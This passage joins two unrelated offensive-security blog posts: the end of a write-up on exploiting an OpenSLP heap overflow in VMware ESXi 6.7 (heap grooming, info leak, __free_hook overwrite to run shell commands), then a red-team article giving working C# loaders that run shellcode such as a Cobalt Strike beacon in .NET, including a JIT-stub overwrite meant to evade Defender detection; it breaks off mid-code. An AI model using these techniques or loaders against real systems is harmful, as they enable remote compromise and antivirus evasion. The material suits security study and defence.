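Both expectations rest on the same idea: the buffer’s position fields, not the data itself, decide where bytes land or come from. The toy model below illustrates that with offsets into a flat bytearray. It is a deliberately simplified sketch and not OpenSLP code: `ToyBuffer`, `toy_recv` and `toy_send` are hypothetical names, and plain integer offsets stand in for the ‘start’, ‘curpos’ and ‘end’ pointers.

```python
class ToyBuffer:
    """Simplified stand-in for _SLPBuffer: offsets play the role of pointers."""

    def __init__(self, start, size):
        self.start = start
        self.curpos = start
        self.end = start + size


def toy_recv(memory, buf, data):
    """Store incoming data at curpos, never past end; return bytes stored."""
    count = min(len(data), buf.end - buf.curpos)
    memory[buf.curpos:buf.curpos + count] = data[:count]
    buf.curpos += count
    return count


def toy_send(memory, buf):
    """Return the bytes between curpos and end, as a send would transmit them."""
    out = bytes(memory[buf.curpos:buf.end])
    buf.curpos = buf.end
    return out


memory = bytearray(64)
memory[48:52] = b"KEEP"              # unrelated data elsewhere in "memory"

recv_buf = ToyBuffer(start=0, size=8)
toy_recv(memory, recv_buf, b"AAAA")  # lands at offset 0, as intended

# If the position fields are changed, the same calls touch other memory.
recv_buf.curpos, recv_buf.end = 32, 36
toy_recv(memory, recv_buf, b"BBBB")  # now lands at offset 32

send_buf = ToyBuffer(start=8, size=8)
send_buf.curpos, send_buf.end = 48, 52
print(toy_send(memory, send_buf))    # returns the bytes stored at 48..52
```

In the toy model nothing else has to change for the redirected read or write to happen, whereas the real daemon also checks the socket state, as discussed further down.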

Now that I have defined the objectives, I have to identify any limitations with the heap overflow vector and memory allocation in general.

Limitations

  1. ‘URL’ data stored in the ‘directory agent advertisement’ ‘URL’ object cannot contain null bytes (due to the ‘strstr’ function). This limitation prevents me from directly overwriting meta-data within an adjacent ‘_SLPDSocket’ or ‘_SLPBuffer’ object because I would have to supply an invalid size value for the object’s heap header before reaching those properties.
  2. The ‘slpd’ binary allocates ‘_SLPDSocket’ and ‘_SLPBuffer’ objects with ‘calloc’. The ‘calloc’ call will zero out the allocated memory slot. This limitation removes all past data of a memory slot, which could contain interesting pointers or stack addresses. This looks like a show stopper because if I were to overwrite a ‘position’ pointer in a _SLPBuffer, I would need to know a valid address value. Since I don’t know such a value, the next best thing I can do is partially overwrite a ‘position’ pointer to at least get me into a valid address range that could be meaningful. With ‘calloc’ zeroing everything out, I lose that opportunity.

Fortunately, not all is lost. As shared in Lucas’ blog post, I can still get around the limitations.

Limitations Bypass

  1. Use the heap overflow to partially overwrite the adjacent free memory chunk’s size to extend it. By extending the free chunk, I can position it to overlap with its neighboring ‘_SLPDSocket’ or ‘_SLPBuffer’ object. When I allocate memory that occupies the extended free space, I can overwrite the object’s properties.
  2. The ‘calloc’ call will retain the past data of a memory slot if the slot was marked ‘IS_MMAPPED’ while it was free. The key thing is that the ‘calloc’ call must request a chunk size that exactly matches the freed slot with the ‘IS_MMAPPED’ flag enabled to preserve its old data. If an ‘IS_MMAPPED’ freed chunk is split up by a ‘calloc’ request, ‘calloc’ will service a chunk without the ‘IS_MMAPPED’ flag and zero out the slot’s content.
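Both bypasses revolve around the size field in a glibc chunk header, whose three low bits are flags rather than part of the size. The sketch below decodes such a field using the standard glibc bit values (`PREV_INUSE` 0x1, `IS_MMAPPED` 0x2, `NON_MAIN_ARENA` 0x4). The helper name `decode_size_field` and the example values are made up for illustration and are not taken from the exploit.

```python
PREV_INUSE = 0x1       # previous chunk is in use
IS_MMAPPED = 0x2       # chunk was obtained through mmap
NON_MAIN_ARENA = 0x4   # chunk belongs to a non-main arena
FLAG_MASK = PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA


def decode_size_field(raw):
    """Split a raw chunk size field into the chunk size and its flag bits."""
    return {
        "size": raw & ~FLAG_MASK,
        "prev_inuse": bool(raw & PREV_INUSE),
        "is_mmapped": bool(raw & IS_MMAPPED),
        "non_main_arena": bool(raw & NON_MAIN_ARENA),
    }


# Illustrative values only: a 0x100 chunk, and a larger size with the
# mmapped bit also set.
for raw in (0x101, 0x123):
    print(hex(raw), decode_size_field(raw))
```

Since the size and the flags share the same bytes, overwriting only the low bytes of this field is enough to change both how far the chunk appears to extend and whether the allocator treats it as mmapped.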

There is still one more catch. Even if I can point the _SLPBuffer at an arbitrary position to store or read data, the ‘slpd’ binary will not comply unless the associated socket state is set to the proper status. Therefore, the heap overflow will also have to overwrite the associated _SLPDSocket object’s meta-data in order to get the arbitrary read and write primitives to work.

Heap Grooming

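This section goes over the heap grooming strategy for the two overwrites described below: the ‘send-buffer’ overwrite (arbitrary read primitive) and the ‘recv-buffer’ overwrite (arbitrary write primitive).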

The Building Blocks

Before I go over the heap grooming design, I want to say a few words about how the SLP messages mentioned earlier fit into the exploitation process.

service request: primarily used for creating a consecutive heap layout and holes.

directory agent advertisement: used to trigger the heap overflow and overwrite into the next neighboring memory block.

service registration: stores user-controlled data in the memory database, which will be retrieved through the ‘attribute request’ message. This message is solely there to set up the ‘attribute request’ and is not used for heap grooming.

attribute request: pulls user-controlled data from the memory database. Its purpose is to create a ‘marker’ that can be used to identify the current position during the information leak stage. Also, the dynamic memory used to store the user-controlled data can be a good stack pivot spot with completely user-controllable content.

Overwrite _SLPBuffer ‘send-buffer’ object (Arbitrary Read Primitive)

(1). Clients A, B, and C create connections to the server. Client A sends a ‘service request’ message. Client D creates a connection and sends a ‘service request’ message. Client B sends a ‘service request’ message.
(2). Close client D’s connection.
(3). Client E creates a connection and sends an ‘attribute request’ message.
(4). Client E’s ‘send-buffer’ will go through reallocation because the data is too large.
(5). Client E’s connection is still intact and not closed, however, the ‘message’ object is now freed.
(6). Clients G and H create connections to the server. Client C will now send a ‘service request’ to fill the hole left by Client E’s ‘send-buffer’ reallocation and freed ‘message’.
(7). Close client B’s connection.
(8). Client F creates connection to server and sends a ‘directory agent advertisement’ message. This leaves a freed 0x100 size chunk right after the ‘URL’ object for extension and overlapping.
(9). The ‘URL’ object extended its neighboring freed chunk size from 0x100 to 0x120. The server will free the allocated objects initiated by client F. It can be observed that all objects related to client F are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fast-bin, the ‘URL’ object did not get coalesced.
(10). Client G sends a ‘service request’ message. The first-fit algorithm will assign the extended free block to client G’s ‘recv-buffer’ object. This object overlaps with client E’s ‘send-buffer’, which can now overwrite the ‘position’ pointers in it.
(11). Client J creates connection to server and sends a ‘service request’ message. Its purpose is to fill up the hole left by client F’s ‘directory agent advertisement’ message.
(12). Close client A’s connection.
(13). Client I creates connection to server and sends a ‘directory agent advertisement’ message.
(14). The ‘URL’ object extended its neighboring freed chunk size from 0x100 to 0x140. The server will free the allocated objects initiated by client I. It can be observed that all objects related to client I are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fast-bin, the ‘URL’ object did not get coalesced.
(15). Client H sends a ‘service request’ message. The first-fit algorithm will assign the extended free block to client H’s ‘recv-buffer’ object. This object overlaps with client E’s ‘slpd-socket’, which can now overwrite the properties in it.

Overwrite _SLPBuffer ‘recv-buffer’ object (Arbitrary Write Primitive)

(1). Client A creates connection to server and sends ‘service request’ message. Client B creates connection only. Client C creates connection and sends ‘service request’ message. Client B now sends ‘service request’ message. Client D and E create connections to server.
(2). Close client C’s connection.
(3). Client F creates connection to server and sends a ‘directory agent advertisement’ message. This leaves a freed 0x100 size chunk right after the ‘URL’ object for extension and overlapping.
(4). The ‘URL’ object extended its neighboring freed chunk size from 0x100 to 0x140. The server will free the allocated objects initiated by client F. It can be observed that all objects related to client F are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fast-bin, the ‘URL’ object did not get coalesced.
(5). Client E sends a ‘service request’ message. The first-fit algorithm will assign the extended free block to client E’s ‘recv-buffer’ object. This object overlaps with client B’s ‘recv-buffer’, which can now overwrite the ‘position’ pointers in it.
(6). Client G creates connection to server and sends a ‘service request’ message. Its purpose is to fill up the hole left by client F’s ‘directory agent advertisement’ message.
(7). Close client A’s connection.
(8). Client H creates connection to server and sends a ‘directory agent advertisement’ message. This leaves a freed 0x100 size chunk right after the ‘URL’ object for extension and overlapping.
(9). The ‘URL’ object extends its neighboring freed chunk from 0x100 to 0x140. The server will free the allocated object initiated by client H. It can be observed that all objects related to client H are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fast-bin, the ‘URL’ object did not get coalesced.
(10). Client D sends a ‘service request’ message. The first-fit algorithm will assign the extended free block to client D’s ‘recv-buffer’ object. This object overlaps with client B’s ‘slpd-socket’, which can now overwrite the properties in it.

The above visual heap layouts were created with villoc.

Exploitation Strategy Walkthrough

It is best to look at the exploit code along with following the below narration to understand how the exploit works.

  1. Client 1 sends a ‘directory agent advertisement’ request to absorb any unexpected memory allocation that this particular request may trigger. I observed that the request makes additional memory allocations when the ‘slpd’ daemon is launched at startup, but not when it is started through /etc/init.d/slpd start. Any unexpected allocation is eventually freed and ends up on the freelist. The assumption is that these freed slots will be reused by future ‘directory agent advertisement’ messages, as long as I do not explicitly allocate memory that would hijack them.
  2. Clients 2–5 each make a ‘service request’ with a receiving buffer of size 0x40. This fills up the initial freed slots that exist on the freelist. If I don’t occupy these freed slots, they would hijack the ‘URL’ memory allocations of future ‘directory agent advertisement’ messages and ruin the heap grooming.
  3. Clients 6–10 set up client 7 to send the ‘service registration’ message to the server. The server only accepts a ‘service registration’ message originating from localhost, so client 7’s ‘slpd-socket’ needs to be overwritten to update its IP address. Once the message is sent, client 7’s socket object is updated again to hold the listening file descriptor so that future incoming connections can be handled. If this step is skipped, future clients cannot establish a connection with the server.
  4. Clients 11–21 set up the arbitrary read primitive by overwriting client 15’s ‘send-buffer’ position pointers. Since I have no knowledge of which addresses to leak in the first place, I perform a partial overwrite of the two least significant bytes of the ‘start’ position pointer with null values. This requires the extended free chunk to be marked ‘IS_MAPPED’ so that it does not get zeroed out by the ‘calloc’ call. The ‘send-buffer’ that gets updated belongs to the ‘attribute request’ message. Because I have no visibility into how much data will be leaked, I get a ballpark idea of where the leak is by including a marker value in the ‘service registration’ message from step 3. If the leaked content contains the marker, I know it is leaking data from the ‘attribute request’ ‘send-buffer’ object, which tells me it is time to stop reading from the leak. Lastly, I have to update client 15’s ‘slpd-socket’ so that its state is ‘STREAM_WRITE’, which makes the server ‘send’ the data to my client.
  5. From the leak I was able to collect heap addresses and libc addresses, from which I can derive everything else. My goal is to overwrite libc’s __free_hook with libc’s system address. I need a gadget to position my stack at a location that won’t be subject to alteration by the application. I found a gadget in libc-2.17.so that lifts the stack address by 0x100.
  6. With the collected libc address, I can calculate the libc environment address, which stores the stack address. I use clients 22–31 to set up the arbitrary read primitive to leak the stack address. I have to update client 25’s file descriptor in the ‘slpd-socket’ to hold the listening file descriptor.
  7. Clients 32–40 set up the arbitrary write primitive. This requires overwriting the position pointers of client 33’s ‘recv-buffer’ object. The exploit first stores shell commands in client 15’s ‘send-buffer’ object, which is a large slab of space under my control. It then writes libc’s system address, a fake return address, and the address of the shell command onto the stack location predicted after the stack lift is performed. Afterwards, it overwrites libc’s __free_hook to hold the stack lifting gadget address. Lastly, each arbitrary write requires updating the corresponding ‘slpd-socket’ object state to ‘STREAM_READ’. If this step is skipped, the server will not accept the overwritten values for the position pointers.
  8. The desired shell commands will be executed once all the above steps are completed.
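The address arithmetic behind steps 4 to 7 can be sketched in a few lines of Python. This is an illustration and not the PoC itself: it assumes a 32-bit little-endian target (which the stack-passed argument in step 7 suggests), and the marker, every address, and every offset below are made-up placeholders.

```python
import struct

MARKER = b"MARKER_1337"  # hypothetical marker placed in the 'service registration' message


def null_low_two_bytes(ptr):
    """Model the partial overwrite from step 4: the two least significant bytes become zero."""
    return ptr & ~0xFFFF & 0xFFFFFFFF


def leak_reached_marker(leak):
    """True once the leaked bytes contain the marker, i.e. it is time to stop reading."""
    return MARKER in leak


def libc_base(leaked_addr, symbol_offset):
    """Derive the libc base from one leaked libc pointer and that symbol's offset."""
    return leaked_addr - symbol_offset


def fake_frame(system_addr, cmd_addr, fake_ret=0x41414141):
    """Lay out system(), a dummy return address and the command pointer, as in step 7."""
    return struct.pack("<III", system_addr, fake_ret, cmd_addr)


# Placeholder values only; none of these come from a real target.
base = libc_base(0xF7E5C3A0, 0x0003C3A0)
frame = fake_frame(base + 0x0003F0B0, 0x0804B000)
```

In a real run the offsets would have to come from the exact libc-2.17.so shipped with the target build, since a different build would shift every value.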

Final Remark

I enjoyed implementing this exploit very much and learned a few things while writing it. One of the biggest lessons is to never make assumptions and to always test an idea out. When I was trying to get the data-leaking part of the exploit to work, I was preparing to implement it the way Lucas described in his blog, which seemed slightly complicated. I was curious as to why I couldn’t just flip the socket object’s state to ‘STREAM_WRITE’, which would send the data back to me. After reviewing the OpenSLP code, I understood the problem and saw why Lucas came up with his particular solution. Nevertheless, I still wanted to see what would happen if I just flipped the state on the socket object, and to my disbelief, the daemon did send me the leaked data immediately without the additional hurdles. Another takeaway is that when designing any heap grooming, it is best to work backward from how I want the heap to look in its finished form and backtrack the layout to the beginning.

The PoC should work out of the box against VMware ESXi 6.7.0 build-14320388, which is the trial version. I was able to get it to work 14 out of 15 tries.

Weird Ways to Run Unmanaged Code in .NET

Original text by Adam Chester

Ever since the release of the .NET framework, the offensive security industry has spent a considerable amount of time crafting .NET projects to accommodate unmanaged code. Usually this comes in the form of a loader, wrapping payloads like Cobalt Strike beacon and invoking executable memory using a few P/Invoke imports. But with endless samples being studied by defenders, the process of simply dllimport’ing Win32 APIs has become more of a challenge, giving rise to alternate techniques such as D/Invoke.

Recently I have been looking at the .NET Common Language Runtime (CLR) internals and wanted to understand what further techniques may be available for executing unmanaged code from the managed runtime. This post contains a snippet of some of the weird techniques that I found.

The samples in this post will focus on .NET 5.0 executing x64 binaries on Windows. The decision by Microsoft to unify .NET means that moving forwards we are going to be working with a single framework rather than the current fragmented set of versions we’ve been used to. That being said, all of the areas discussed can be applied to earlier versions of the .NET framework, other architectures and operating systems… let’s get started.

A Quick History Lesson

What are we typically trying to achieve when executing unmanaged code in .NET? Often for us as Red Teamers, we are looking to do something like running a raw beacon payload, where native code is executed from within a C# wrapper.

For a long time, the most common way of doing this looked something like:

[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

[DllImport("kernel32.dll")]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

public static void StartShellcode(byte[] shellcode)
{
    uint threadId;

    IntPtr alloc = VirtualAlloc(IntPtr.Zero, shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);
    if (alloc == IntPtr.Zero) {
        return;
    }

    Marshal.Copy(shellcode, 0, alloc, shellcode.Length);
    IntPtr threadHandle = CreateThread(IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, out threadId);
    WaitForSingleObject(threadHandle, 0xFFFFFFFF);
}

And all was fine, however it did not take long before defenders realised that a .NET binary referencing a bunch of suspicious methods provided a good indicator that the binary warranted further investigation:

And as an example of the obvious indicators that these imported methods yield, you will see that if you try and compile the above example on a machine protected by Defender, Microsoft will pop up a nice warning that you’ve just infected yourself with VirTool:MSIL/Viemlod.gen!A.

So with these detections throwing a spanner in the works, techniques of course evolved. One such evolution of unmanaged code execution came from the awesome research completed by @fuzzysec and @TheRealWover, who introduced the D/Invoke technique. If we exclude the project’s DLL loader for the moment, the underlying technique to transition from managed to unmanaged code used by D/Invoke is facilitated by a crucial method, Marshal.GetDelegateForFunctionPointer. And if we look at the documentation, Microsoft tells us that this method “Converts an unmanaged function pointer to a delegate”. This gets around the fundamental problem of exposing those nasty imports, forcing defenders to go beyond the ImplMap table. A simple example of how we might use Marshal.GetDelegateForFunctionPointer to execute unmanaged code within an x64 process would be:

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr VirtualAllocDelegate(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr ShellcodeDelegate();

public static IntPtr GetExportAddress(IntPtr baseAddr, string name)
{
    var dosHeader = Marshal.PtrToStructure<IMAGE_DOS_HEADER>(baseAddr);
    var peHeader = Marshal.PtrToStructure<IMAGE_OPTIONAL_HEADER64>(baseAddr + dosHeader.e_lfanew + 4 + Marshal.SizeOf<IMAGE_FILE_HEADER>());
    var exportHeader = Marshal.PtrToStructure<IMAGE_EXPORT_DIRECTORY>(baseAddr + (int)peHeader.ExportTable.VirtualAddress);

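    for (int i = 0; i < exportHeader.NumberOfNames; i++)
    {
        var nameAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfNames + (i * 4));
        var m = Marshal.PtrToStringAnsi(baseAddr + (int)nameAddr);
        if (m == name)
        {
            // The name index maps to a function index through the ordinal table
            // (assumes the struct exposes the standard AddressOfNameOrdinals field)
            var ordinal = (ushort)Marshal.ReadInt16(baseAddr + (int)exportHeader.AddressOfNameOrdinals + (i * 2));
            var exportAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfFunctions + (ordinal * 4));
            return baseAddr + (int)exportAddr;
        }
    }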

    return IntPtr.Zero;
}

public static void StartShellcodeViaDelegate(byte[] shellcode)
{
    IntPtr virtualAllocAddr = IntPtr.Zero;

    foreach (ProcessModule module in Process.GetCurrentProcess().Modules)
    {
        if (module.ModuleName.ToLower() == "kernel32.dll")
        {
            virtualAllocAddr = GetExportAddress(module.BaseAddress, "VirtualAlloc");
        }
    }

    var VirtualAlloc = Marshal.GetDelegateForFunctionPointer<VirtualAllocDelegate>(virtualAllocAddr);
    var execMem = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);

    Marshal.Copy(shellcode, 0, execMem, shellcode.Length);

    var shellcodeCall = Marshal.GetDelegateForFunctionPointer<ShellcodeDelegate>(execMem);
    shellcodeCall();
}
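
When an export is resolved by name, the position of the match in the name table is translated through the ordinal table before it is used as an index into the function table. The toy model below shows that indirection in Python. The three tables and their RVAs are made up for illustration and are not taken from kernel32.dll.

```python
def resolve_export(names, name_ordinals, functions, wanted):
    """Return the RVA exported under `wanted`, or None when the name is absent."""
    for i, name in enumerate(names):
        if name == wanted:
            # names[i] pairs with name_ordinals[i], which indexes functions
            return functions[name_ordinals[i]]
    return None


# Hypothetical tables: the names are sorted, the function table is not.
names = ["CreateThread", "VirtualAlloc", "WaitForSingleObject"]
name_ordinals = [2, 0, 1]
functions = [0x1A000, 0x2B000, 0x3C000]

rva = resolve_export(names, name_ordinals, functions, "VirtualAlloc")
```

Indexing the function table directly with the name index would return 0x2B000 here, which belongs to a different export.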

So, with these methods out in the wild, are there any other techniques that we have available to us?

Targeting What We Cannot See

One of the areas hidden from casual .NET developers is the underlying CLR itself. Thankfully, Microsoft releases the source code for the CLR on GitHub, giving us a peek into how this beast actually operates.

Let’s start by looking at a very simple application:

using System;
using System.Runtime.InteropServices;

namespace Test
{
    public class Test
    {
        public static void Main(string[] args)
        {
            var testObject = "XPN TEST";
            GCHandle handle = GCHandle.Alloc(testObject);
            IntPtr parameter = (IntPtr)handle;
            Console.WriteLine("testObject at addr: {0}", parameter);
            Console.ReadLine();
        }
    }
}

Once we have this compiled, we can attach WinDBG to gather some information on the internals of the CLR during execution. We’ll start with the pointer outputted by this program and use the !dumpobj command provided by the SOS extension to reveal some information on what the memory address references:

As expected, we see that this memory points to a System.String .NET object, and we find the addresses of various associated fields available to us. The first class that we are going to look at is MethodTable, which represents a .NET class or interface to the CLR. We can inspect this further with a WinDBG helper method of !dumpmt [ADDRESS]:

We can also dump a list of methods associated with the System.String .NET class with !dumpmt -md [ADDRESS]:

So how are the System.String .NET methods found relative to a MethodTable? Well according to what has become a bit of a bible of .NET internals for me, we need to study the EEClass class. We can do this using dt coreclr!EEClass [ADDRESS]:

Again, we see several fields, but of interest to identifying associated .NET methods is the m_pChunks field, which references a MethodDescChunk object consisting of a simple structure:

Appended to a MethodDescChunk object is an array of MethodDesc objects, which represent .NET methods exposed by the .NET class (in our case System.String). When running within an x64 process, the first MethodDesc sits 0x18 bytes into the chunk, directly after the MethodDescChunk header:

To retrieve information on this method, we can pass the address over to the !dumpmd helper command which tells us that the first .NET method of our System.String is System.String.Replace:

Now before we continue, it’s worth giving a quick insight into how the JIT compilation process works when executing a method from .NET. As I’ve discussed in previous posts, the JIT process is “lazy” in that a method won’t be JIT’ed up front (with some exceptions which we won’t cover here). Instead compilation is deferred to first use, by directing execution via the coreclr!PrecodeFixupThunk method, which acts as a trampoline to compile the method:

Once a method is executed, the native code is JIT’ed and this trampoline is replaced with a JMP to the actual compiled code.
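
The control flow of that lazy replacement can be modelled in a few lines of Python. This is only a toy: the class and attribute names are invented, and nothing here reflects how the CLR actually stores or patches its stubs.

```python
class LazyMethod:
    """Toy method whose entry point starts out as a compile-on-first-call stub."""

    def __init__(self, source):
        self.source = source
        self.compile_count = 0
        self.entry = self._fixup_stub  # stands in for the pre-JIT trampoline

    def _fixup_stub(self, *args):
        # First call: "compile" the method, then repoint the entry at the result.
        self.compile_count += 1
        compiled = self.source
        self.entry = compiled
        return compiled(*args)

    def __call__(self, *args):
        return self.entry(*args)


replace = LazyMethod(lambda s, old, new: s.replace(old, new))
first = replace("ANYSTRING", "ANY", "SOME")   # goes through the stub
second = replace("ANYSTRING", "ANY", "SOME")  # goes straight to the compiled code
```

The point to take away is that whoever controls the entry before the first call controls where execution goes.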

So how do we find the pointer to this trampoline? Well usually this pointer would live in a slot, which is located within a vector following the MethodTable, which is in turn indexed by the m_wSlotNumber of the MethodDesc object. But in some cases, this pointer immediately follows the MethodDesc object itself, as a so-called “Local Slot”. We can tell if this is the case by looking at the m_wFlags member of the MethodDesc object for a method, and seeing if the mdcHasNonVtableSlot flag (0x0008 in the code later in this post) has been set.

If we dump the memory for our MethodDesc, we can see this pointer being located immediately after the object:

OK with our knowledge of how the JIT process works and some idea of how the memory layout of a .NET method looks in unmanaged land, let’s see if we can use this to our advantage when looking to execute unmanaged code.
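
As a rough model of the layout described above, the Python sketch below decodes the first 16 bytes of a MethodDesc using the field offsets from the C# structs later in this post, then checks the local-slot flag. The sample bytes are fabricated, and the layout should be treated as specific to the runtime build examined here.

```python
import struct

MDC_HAS_NON_VTABLE_SLOT = 0x0008  # value used by the PoC code in this post

FIELDS = ("m_wFlags3AndTokenRemainder", "m_chunkIndex", "m_bFlags2",
          "m_wSlotNumber", "m_wFlags", "slot")


def parse_method_desc(raw):
    """Decode 2+1+1+2+2 bytes of header followed by the 8-byte slot at offset 8."""
    return dict(zip(FIELDS, struct.unpack_from("<HBBHHQ", raw, 0)))


def has_local_slot(md):
    """True when the entry point pointer directly follows the MethodDesc."""
    return (md["m_wFlags"] & MDC_HAS_NON_VTABLE_SLOT) != 0


# Fabricated sample: flags 0x0028, slot pointing at a made-up stub address.
sample = struct.pack("<HBBHHQ", 0x0001, 0, 0x21, 0x0005, 0x0028, 0x00007FFA12345678)
md = parse_method_desc(sample)
```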

Hijacking JIT Compilation to Execute Unmanaged Code

To execute our unmanaged code, we need to gain control over the RIP register, which, now that we understand how execution flows via the JIT process, should be relatively straightforward.

To do this we will define a few structures which will help us to follow along and demonstrate our POC code a little more clearly. Let’s start with a MethodTable:

[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
    [FieldOffset(0)]
    public uint m_dwFlags;

    [FieldOffset(0x4)]
    public uint m_BaseSize;

    [FieldOffset(0x8)]
    public ushort m_wFlags2;

    [FieldOffset(0x0a)]
    public ushort m_wToken;

    [FieldOffset(0x0c)]
    public ushort m_wNumVirtuals;

    [FieldOffset(0x0e)]
    public ushort m_wNumInterfaces;

    [FieldOffset(0x10)]
    public IntPtr m_pParentMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pLoaderModule;

    [FieldOffset(0x20)]
    public IntPtr m_pWriteableData;

    [FieldOffset(0x28)]
    public IntPtr m_pEEClass;

    [FieldOffset(0x30)]
    public IntPtr m_pPerInstInfo;

    [FieldOffset(0x38)]
    public IntPtr m_pInterfaceMap;
}

Then we will also require an EEClass:

[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
    [FieldOffset(0)]
    public IntPtr m_pGuidInfo;

    [FieldOffset(0x8)]
    public IntPtr m_rpOptionalFields;

    [FieldOffset(0x10)]
    public IntPtr m_pMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pFieldDescList;

    [FieldOffset(0x20)]
    public IntPtr m_pChunks;
}

Next we need our MethodDescChunk:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
    [FieldOffset(0)]
    public IntPtr m_methodTable;

    [FieldOffset(8)]
    public IntPtr m_next;

    [FieldOffset(0x10)]
    public byte m_size;

    [FieldOffset(0x11)]
    public byte m_count;

    [FieldOffset(0x12)]
    public byte m_flagsAndTokenRange;
}

And finally a MethodDesc:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
    [FieldOffset(0)]
    public ushort m_wFlags3AndTokenRemainder;

    [FieldOffset(2)]
    public byte m_chunkIndex;

    [FieldOffset(0x3)]
    public byte m_bFlags2;

    [FieldOffset(0x4)]
    public ushort m_wSlotNumber;

    [FieldOffset(0x6)]
    public ushort m_wFlags;

    [FieldOffset(0x8)]
    public IntPtr TempEntry;
}

With each structure defined, we’ll work with the System.String type and populate each struct:

Type t = typeof(System.String);
var mt = Marshal.PtrToStructure<MethodTable>(t.TypeHandle.Value);
var ee = Marshal.PtrToStructure<EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<MethodDescChunk>(ee.m_pChunks);
var md = Marshal.PtrToStructure<MethodDesc>(ee.m_pChunks + 0x18);

One snippet from above worth mentioning is t.TypeHandle.Value. Usefully for us, .NET provides us with a way to find the address of a MethodTable via the TypeHandle property of a type. This saves us some time hunting through memory when we are looking to target a .NET class such as the above System.String type.
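
The pointer chain that this snippet follows can be modelled without touching a real process. In the Python sketch below a dictionary stands in for memory; the three offsets come from the struct definitions above, while the addresses and the FakeMemory helper are invented for illustration.

```python
OFF_EECLASS = 0x28   # MethodTable.m_pEEClass
OFF_CHUNKS = 0x20    # EEClass.m_pChunks
CHUNK_HEADER = 0x18  # offset of the first MethodDesc inside the chunk


class FakeMemory:
    """Sparse, address-keyed stand-in for process memory (illustration only)."""

    def __init__(self):
        self.pointers = {}

    def write_ptr(self, addr, value):
        self.pointers[addr] = value

    def read_ptr(self, addr):
        return self.pointers[addr]


def first_method_desc(mem, method_table):
    """Walk MethodTable -> EEClass -> MethodDescChunk and return the first MethodDesc address."""
    ee_class = mem.read_ptr(method_table + OFF_EECLASS)
    chunk = mem.read_ptr(ee_class + OFF_CHUNKS)
    return chunk + CHUNK_HEADER


mem = FakeMemory()
mem.write_ptr(0x1000 + OFF_EECLASS, 0x2000)  # MethodTable at 0x1000
mem.write_ptr(0x2000 + OFF_CHUNKS, 0x3000)   # EEClass at 0x2000
md_addr = first_method_desc(mem, 0x1000)
```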

Once we have the CLR structures for the System.String type, we can find our first .NET method pointer which as we saw above points to System.String.Replace:

// Located at MethodDescChunk_ptr + sizeof(MethodDescChunk) + sizeof(MethodDesc)
IntPtr stub = Marshal.ReadIntPtr(ee.m_pChunks + 0x18 + 0x8);

This gives us an IntPtr pointing to RWX protected memory, which we know is going to be executed once we invoke the System.String.Replace method for the first time, which will be when JIT compilation kicks in. Let’s see this in action by jmp’ing to some unmanaged code. We will of course use a Cobalt Strike beacon to demonstrate this:

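byte[] shellcode = System.IO.File.ReadAllBytes("beacon.bin");
IntPtr mem = VirtualAlloc(IntPtr.Zero, shellcode.Length, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);
if (mem == IntPtr.Zero) {
    return;
}

Marshal.Copy(shellcode, 0, mem, shellcode.Length);

// Overwrite the stub with "mov rax, <mem>; jmp rax" so that it lands in our shellcode
var jmpCode = new byte[] { 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xE0 };
Marshal.Copy(jmpCode, 0, stub, jmpCode.Length);
Marshal.WriteIntPtr(stub + 2, mem);

// Now we invoke our unmanaged code
"ANYSTRING".Replace("XPN","WAZ'ERE", true, null);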

Put together we get code like this:

using System;
using System.Runtime.InteropServices;
namespace NautilusProject
{
    public class ExecStubOverwrite
    {
        public static void Execute(byte[] shellcode)
        {
            // mov rax, 0x4141414141414141
            // jmp rax
            var jmpCode = new byte[] { 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xE0 };
            var t = typeof(System.String);
            var mt = Marshal.PtrToStructure<Internals.MethodTable>(t.TypeHandle.Value);
            var ec = Marshal.PtrToStructure<Internals.EEClass>(mt.m_pEEClass);
            var mdc = Marshal.PtrToStructure<Internals.MethodDescChunk>(ec.m_pChunks);
            var md = Marshal.PtrToStructure<Internals.MethodDesc>(ec.m_pChunks + 0x18);
            if ((md.m_wFlags & Internals.mdcHasNonVtableSlot) != Internals.mdcHasNonVtableSlot)
            {
                Console.WriteLine("[x] Error: mdcHasNonVtableSlot not set for this MethodDesc");
                return;
            }
            // Get the String.Replace method stub
            IntPtr stub = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 8);
            // Alloc mem with p/invoke for now...
            var mem = Internals.VirtualAlloc(IntPtr.Zero, shellcode.Length, Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite);
            Marshal.Copy(shellcode, 0, mem, shellcode.Length);
            // Point the stub to our shellcode
